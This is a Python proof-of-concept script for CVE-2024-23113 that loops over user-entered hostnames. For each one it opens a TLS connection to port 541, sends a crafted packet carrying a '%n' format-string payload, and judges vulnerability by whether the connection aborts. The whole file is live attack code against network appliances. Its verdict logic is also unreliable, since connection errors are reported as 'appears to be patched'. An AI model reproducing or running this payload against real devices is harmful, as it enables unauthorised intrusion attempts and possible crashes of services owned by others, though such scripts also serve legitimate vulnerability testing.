POC-CVE-2024-23113.py

import socket
import ssl
import struct

def check_vulnerability(hostname):
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    context.options |= ssl.OP_NO_COMPRESSION

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(5)
        try:
            sock.connect((hostname, 541))
        except socket.error as e:
            print(f"[-] Could not connect to {hostname}: {e}")
            return False

        try:
            with context.wrap_socket(sock, server_hostname=hostname, suppress_ragged_eofs=True) as ssock:
                initial_data = ssock.recv(1024)
                if not initial_data:
                    print("[-] No initial data received from server.")
                    return False
                
                if len(initial_data) >= 8:
                    pkt_flags = struct.unpack('i', initial_data[:4])[0]
                    pkt_len = struct.unpack('i', initial_data[4:8])[0] - 2
                else:
                    print("[-] Initial data received is too short.")
                    return False

                payload = ssock.recv(pkt_len - 8)
                if len(payload) < pkt_len - 8:
                    print("[-] Incomplete payload received.")
                    return False

                format_string_payload = b"reply 200\r\nrequest=auth\r\nauthip=%n\r\n\r\n\x00"
                packet = b''
                packet += 0x0001e034.to_bytes(4, 'little')
                packet += (len(format_string_payload) + 8).to_bytes(4, 'big')
                packet += format_string_payload

                ssock.send(packet)

                response = ssock.recv(1024)
                if response:
                    print("[+] Device is likely not vulnerable - received response.")
                    return False
                else:
                    print("[+] No response received - further analysis needed.")
                    return False
        except ssl.SSLError as ssl_err:
            if "tlsv1 alert" in str(ssl_err).lower() or "unexpected message" in str(ssl_err).lower():
                print(f"[+] Device {hostname} might be vulnerable. Connection aborted as expected.")
                return True
            else:
                print(f"[-] Unexpected SSL error: {ssl_err}")
                return False
        except socket.error as sock_err:
            print(f"[-] Socket error: {sock_err}")
            return False

def main():
    while True:
        hostname = input("Enter the hostname to check (or 'exit' to quit): ")
        if hostname.lower() == 'exit':
            break

        is_vulnerable = check_vulnerability(hostname)
        if is_vulnerable:
            print(f"[!] Warning: {hostname} is vulnerable!")
        else:
            print(f"[+] {hostname} appears to be patched.")

if __name__ == "__main__":
    main()